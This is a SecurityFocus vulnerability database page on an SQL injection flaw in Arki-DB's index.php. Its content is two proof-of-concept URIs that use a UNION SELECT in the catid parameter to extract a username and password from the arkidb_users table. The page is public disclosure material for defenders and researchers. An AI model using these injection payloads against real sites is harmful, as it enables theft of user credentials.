Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Arki-DB Index.PHP SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1







 

Privacy Statement
Copyright 2008, SecurityFocus